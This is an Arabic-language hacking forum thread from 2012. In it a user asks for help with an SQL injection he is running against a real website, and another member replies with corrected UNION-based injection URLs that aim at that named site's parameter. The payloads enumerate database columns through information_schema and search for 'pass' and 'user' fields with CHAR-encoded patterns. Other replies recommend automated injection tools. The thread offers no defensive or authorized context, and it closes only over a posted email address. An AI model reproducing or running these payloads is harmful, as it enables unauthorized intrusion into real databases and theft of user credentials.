التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 11-18-2012, 01:32 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Senor os
زائـــر
 
الصورة الرمزية Senor os
 

 

 
إحصائية العضو




 

 

................ مجاب: مساعدة بخصوص حقن موقع


السلام عليكم المرجو المساعدة : كنت اقوم باختراق موقع لكن عندما وصلت الى where+column_name+LIKE+%pas% لا يظهر لي اي شيء ، ما الحل ؟؟؟




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC lshu]m fow,w prk l,ru

   

أفضل جواب - كتبه googles
ممم المشكل سهل جدا لديك خطأ في الامر :
هذا هو الامر الذي وضعت :
كود PHP:
www.pouet.net/bbses.php?which=-713 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name,0x3 a,table_schema),8,9+from+information_schema.column s+where+column_name+LIKE+CHAR(371129711511537)-- 
أنظر هذا هو الامر الصحيح :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- 
اضغط هنا لرؤية الصورة
كما ترى لم يجد أي جدول أو أي عمود يحتوي على كلمة pass المشفرة بــ char

ولاكن يمكنك تشفير %user% بـ char لترى هل هناك نتيجة أم لا
طيب أنا قمت بتشفير %user%
هذا هو الامر :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 117, 115, 101, 114, 37)-- 
وهذه صورة توضيحية لنتيجة
اظغط هنا لرؤية الصورة

أترك لك البقية
تحياتي .
قديم 11-18-2012, 11:49 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية PortoMan
 

 

 
إحصائية العضو






PortoMan غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
PortoMan is on a distinguished road

افتراضي رد: maestro-23@hotmail.fr


حبيبى حاول تعتمد على الحقن ببرامج لانه اسرع وافضل
اما بالنسبة الى امر الحقن اليدوى الذى قمت انت بكتباتة فهذا تقريبا يعتبر امر من الامور التى يمكن ان يكون معمول لها ايقاف او باند لانها ليست ضرورية فى استحضار البيانات من جداول SQL لو كنت تتعمال مع اوركال اقولك ناقصك بس تكتب فى اخر الامر ++ وكان يعمل معك .
"الخلاصة اعتقد ان الامر دا تم اقافة من قائمة الجداول فى SQL " والله اعلم

   

قديم 11-18-2012, 03:59 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية maestro-23
 

 

 
إحصائية العضو





maestro-23 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
maestro-23 is on a distinguished road

افتراضي رد: maestro-23@hotmail.fr


شكرآا لك اخي الكريم

   

قديم 11-18-2012, 04:56 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي رد: maestro-23@hotmail.fr


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة PortoMan
حبيبى حاول تعتمد على الحقن ببرامج لانه اسرع وافضل
اما بالنسبة الى امر الحقن اليدوى الذى قمت انت بكتباتة فهذا تقريبا يعتبر امر من الامور التى يمكن ان يكون معمول لها ايقاف او باند لانها ليست ضرورية فى استحضار البيانات من جداول SQL لو كنت تتعمال مع اوركال اقولك ناقصك بس تكتب فى اخر الامر ++ وكان يعمل معك .
"الخلاصة اعتقد ان الامر دا تم اقافة من قائمة الجداول فى SQL " والله اعلم

توضيح فقط اخي
هو طلب جدول يكون احد حقوله كلمة pass او شبيهة لها لكن احقول لاتحتوي على كلمة pass لانو اغلبهم يغير لمحتى اخر
والشيء الثاني البرامج هي الي تعطيك الباند لانو تتعامل مع القواعد بالزياده
التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

قديم 11-18-2012, 06:46 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية googles
 

 

 
إحصائية العضو





googles غير متواجد حالياً

إرسال رسالة عبر MSN إلى googles

 

 

إحصائية الترشيح

عدد النقاط : 10
googles is on a distinguished road

افتراضي رد: maestro-23@hotmail.fr


المرجوا منك التوضيح أكثر :
ضع الرابط كامل واحدف فقط اسم الموقع اذا كنت لا تريد أن يراه أحد.
لنتمكن من مساعدتك

   

قديم 11-19-2012, 01:50 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية maestro-23
 

 

 
إحصائية العضو





maestro-23 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
maestro-23 is on a distinguished road

افتراضي رد: maestro-23@hotmail.fr


ها هو الرابط يا اخي ، و شكرا على مساعدتكم :
www.pouet.net/bbses.php?which=-713 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name,0x3 a,table_schema),8,9+from+information_schema.column s+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)--


التعديل الأخير تم بواسطة maestro-23 ; 11-19-2012 الساعة 01:53 AM.

   

قديم 11-19-2012, 09:09 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية googles
 

 

 
إحصائية العضو





googles غير متواجد حالياً

إرسال رسالة عبر MSN إلى googles

 

 

إحصائية الترشيح

عدد النقاط : 10
googles is on a distinguished road

افتراضي رد: maestro-23@hotmail.fr


ممم المشكل سهل جدا لديك خطأ في الامر :
هذا هو الامر الذي وضعت :

كود PHP:
www.pouet.net/bbses.php?which=-713 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name,0x3 a,table_schema),8,9+from+information_schema.column s+where+column_name+LIKE+CHAR(371129711511537)-- 
أنظر هذا هو الامر الصحيح :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- 
اضغط هنا لرؤية الصورة
كما ترى لم يجد أي جدول أو أي عمود يحتوي على كلمة pass المشفرة بــ char

ولاكن يمكنك تشفير %user% بـ char لترى هل هناك نتيجة أم لا
طيب أنا قمت بتشفير %user%
هذا هو الامر :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 117, 115, 101, 114, 37)-- 
وهذه صورة توضيحية لنتيجة
اظغط هنا لرؤية الصورة

أترك لك البقية
تحياتي .

   

قديم 11-19-2012, 11:50 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية mido868
 

 

 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road

افتراضي رد: مساعدة بخصوص حقن موقع


تم تعديل العنوان ومرة أخرى لا تضع بريدك الالكترونى فى المشاركة ضد قوانين القسم
يــــــــغــــــــلـــــــــــــــــــق
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 

   

موضوع مغلق

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:37 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0